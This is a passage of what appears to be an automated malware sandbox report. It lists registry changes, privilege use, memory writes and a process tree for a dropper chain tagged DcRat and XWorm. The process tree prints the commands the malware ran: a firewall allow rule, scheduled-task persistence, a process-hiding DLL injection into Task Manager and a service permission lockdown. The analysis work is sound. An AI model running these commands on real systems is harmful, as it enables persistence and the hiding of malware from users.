Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates Awwnbpxqsf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates Awwnbpxqsf.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2892 = "Sudan Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs Awwnbpxqsf.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-491 = "India Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople Awwnbpxqsf.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2372 = "Easter Island Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2612 = "Bougainville Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-462 = "Afghanistan Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2752 = "Tomsk Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2791 = "Novosibirsk Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1184116928-951304463-2249875399-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5244 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3688 powershell.exe 3688 powershell.exe 4508 powershell.exe 2920 powershell.exe 2920 powershell.exe 4508 powershell.exe 4508 powershell.exe 2920 powershell.exe 32 nsb7D6F.tmp 32 nsb7D6F.tmp 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 4340 powershell.exe 4340 powershell.exe 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 2332 Conhost.exe 2332 Conhost.exe 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found 3296 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3296 Process not Found -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 3688 powershell.exe 4340 powershell.exe 3692 3EE8.exe 2200 schtasks.exe 4364 c42b27e42760a1e1812ef9db5f9abb3424c5f9fb5390b006b0a39f6b28cc259c.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4216 4363463463464363463463463.exe Token: SeDebugPrivilege 4508 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeDebugPrivilege 2772 Awwnbpxqsf.exe Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeDebugPrivilege 2332 Conhost.exe Token: SeImpersonatePrivilege 2332 Conhost.exe Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeDebugPrivilege 1640 powershell.exe Token: SeDebugPrivilege 3932 Archevod_XWorm.exe Token: SeDebugPrivilege 2668 Conhost.exe Token: SeDebugPrivilege 2152 BLduscfibj.exe Token: SeDebugPrivilege 1544 BLduscfibj.exe Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeDebugPrivilege 3688 powershell.exe Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found Token: SeShutdownPrivilege 3296 Process not Found Token: SeCreatePagefilePrivilege 3296 Process not Found -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 440 BroomSetup.exe 1836 %EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe 3932 Archevod_XWorm.exe 4988 E80E.exe 780 Client.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3296 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4216 wrote to memory of 3884 4216 4363463463464363463463463.exe 80 PID 4216 wrote to memory of 3884 4216 4363463463464363463463463.exe 80 PID 4216 wrote to memory of 3884 4216 4363463463464363463463463.exe 80 PID 3884 wrote to memory of 4960 3884 latestroc.exe 88 PID 3884 wrote to memory of 4960 3884 latestroc.exe 88 PID 3884 wrote to memory of 4960 3884 latestroc.exe 88 PID 3884 wrote to memory of 3688 3884 latestroc.exe 178 PID 3884 wrote to memory of 3688 3884 latestroc.exe 178 PID 3884 wrote to memory of 3688 3884 latestroc.exe 178 PID 3884 wrote to memory of 2332 3884 latestroc.exe 242 PID 3884 wrote to memory of 2332 3884 latestroc.exe 242 PID 3884 wrote to memory of 2332 3884 latestroc.exe 242 PID 4960 wrote to memory of 440 4960 InstallSetup8.exe 84 PID 4960 wrote to memory of 440 4960 InstallSetup8.exe 84 PID 4960 wrote to memory of 440 4960 InstallSetup8.exe 84 PID 3884 wrote to memory of 4288 3884 latestroc.exe 82 PID 3884 wrote to memory of 4288 3884 latestroc.exe 82 PID 4960 wrote to memory of 32 4960 InstallSetup8.exe 175 PID 4960 wrote to memory of 32 4960 InstallSetup8.exe 175 PID 4960 wrote to memory of 32 4960 InstallSetup8.exe 175 PID 440 wrote to memory of 2760 440 BroomSetup.exe 173 PID 440 wrote to memory of 2760 440 BroomSetup.exe 173 PID 440 wrote to memory of 2760 440 BroomSetup.exe 173 PID 4216 wrote to memory of 1836 4216 4363463463464363463463463.exe 172 PID 4216 wrote to memory of 1836 4216 4363463463464363463463463.exe 172 PID 4216 wrote to memory of 1836 4216 4363463463464363463463463.exe 172 PID 2760 wrote to memory of 4360 2760 cmd.exe 272 PID 2760 wrote to memory of 4360 2760 cmd.exe 272 PID 2760 wrote to memory of 4360 2760 cmd.exe 272 PID 2760 wrote to memory of 3200 2760 cmd.exe 111 PID 2760 wrote to memory of 3200 2760 cmd.exe 111 PID 2760 wrote to memory of 3200 2760 cmd.exe 111 PID 2332 wrote to memory of 4508 2332 Conhost.exe 122 PID 2332 wrote to memory of 4508 2332 Conhost.exe 122 PID 2332 wrote to memory of 4508 2332 Conhost.exe 122 PID 4216 wrote to memory of 936 4216 4363463463464363463463463.exe 126 PID 4216 wrote to memory of 936 4216 4363463463464363463463463.exe 126 PID 936 wrote to memory of 2920 936 setup.exe 192 PID 936 wrote to memory of 2920 936 setup.exe 192 PID 4216 wrote to memory of 492 4216 4363463463464363463463463.exe 255 PID 4216 wrote to memory of 492 4216 4363463463464363463463463.exe 255 PID 4216 wrote to memory of 492 4216 4363463463464363463463463.exe 255 PID 4216 wrote to memory of 4340 4216 4363463463464363463463463.exe 195 PID 4216 wrote to memory of 4340 4216 4363463463464363463463463.exe 195 PID 4216 wrote to memory of 4340 4216 4363463463464363463463463.exe 195 PID 4216 wrote to memory of 2772 4216 4363463463464363463463463.exe 130 PID 4216 wrote to memory of 2772 4216 4363463463464363463463463.exe 130 PID 4216 wrote to memory of 2772 4216 4363463463464363463463463.exe 130 PID 4216 wrote to memory of 4628 4216 4363463463464363463463463.exe 253 PID 4216 wrote to memory of 4628 4216 4363463463464363463463463.exe 253 PID 4216 wrote to memory of 4628 4216 4363463463464363463463463.exe 253 PID 4628 wrote to memory of 1820 4628 WerFault.exe 134 PID 4628 wrote to memory of 1820 4628 WerFault.exe 134 PID 4628 wrote to memory of 1820 4628 WerFault.exe 134 PID 4628 wrote to memory of 1820 4628 WerFault.exe 134 PID 4628 wrote to memory of 1820 4628 WerFault.exe 134 PID 4216 wrote to memory of 4224 4216 4363463463464363463463463.exe 142 PID 4216 wrote to memory of 4224 4216 4363463463464363463463463.exe 142 PID 4216 wrote to memory of 4224 4216 4363463463464363463463463.exe 142 PID 4512 wrote to memory of 1640 4512 31839b57a4f11171d6abc8bbc4451ee4.exe 155 PID 4512 wrote to memory of 1640 4512 31839b57a4f11171d6abc8bbc4451ee4.exe 155 PID 4512 wrote to memory of 1640 4512 31839b57a4f11171d6abc8bbc4451ee4.exe 155 PID 4216 wrote to memory of 2668 4216 4363463463464363463463463.exe 232 PID 4216 wrote to memory of 2668 4216 4363463463464363463463463.exe 232 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Users\Admin\AppData\Local\Temp\Files\latestroc.exe"C:\Users\Admin\AppData\Local\Temp\Files\latestroc.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"3⤵PID:2332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 3924⤵
- Program crash
PID:3508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 4084⤵
- Program crash
PID:692
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 4124⤵
- Program crash
PID:1552
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 1444⤵
- Program crash
PID:4848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 7404⤵
- Program crash
PID:3388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 7404⤵
- Program crash
PID:3736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 7924⤵
- Program crash
PID:3912
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 8524⤵
- Program crash
PID:2984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 8084⤵
- Program crash
PID:1120
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 7244⤵
- Program crash
PID:2668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 9004⤵
- Program crash
PID:3740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 9044⤵
- Program crash
PID:2908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 1444⤵
- Program crash
PID:4224
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 8604⤵
- Program crash
PID:2564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 6524⤵
- Program crash
PID:412
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 9204⤵
- Program crash
PID:4540
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"4⤵
- DcRat
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 3765⤵
- Program crash
PID:3560
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 3805⤵
- Program crash
PID:1964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 6765⤵
- Program crash
PID:828
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 7165⤵
- Program crash
PID:3364
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 7365⤵
- Program crash
PID:1416
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 7365⤵
- Program crash
PID:4180
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 7525⤵
- Program crash
PID:5036
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 6765⤵
- Program crash
PID:3548
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 3605⤵
- Program crash
PID:1016
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:3128
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:2328
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4060
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:1384 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 3926⤵
- Program crash
PID:4696
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 4166⤵
- Program crash
PID:4624
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 3926⤵
- Program crash
PID:848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 6966⤵
- Program crash
PID:2960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 7446⤵
- Program crash
PID:1440
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 7286⤵
- Program crash
PID:2096
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 7286⤵
- Program crash
PID:932
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 7726⤵
- Program crash
PID:3700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 8086⤵
- Program crash
PID:2748
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1912
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 9326⤵
- Program crash
PID:900
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 9446⤵
- Program crash
PID:4828
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:748
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:1376
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 9526⤵
- Program crash
PID:4752
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 9846⤵
- Program crash
PID:2876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 10406⤵
- Program crash
PID:2932
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:492
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:3192
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:2372 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:928
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:4360
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1384 -s 11286⤵
- Program crash
PID:2284
-
-
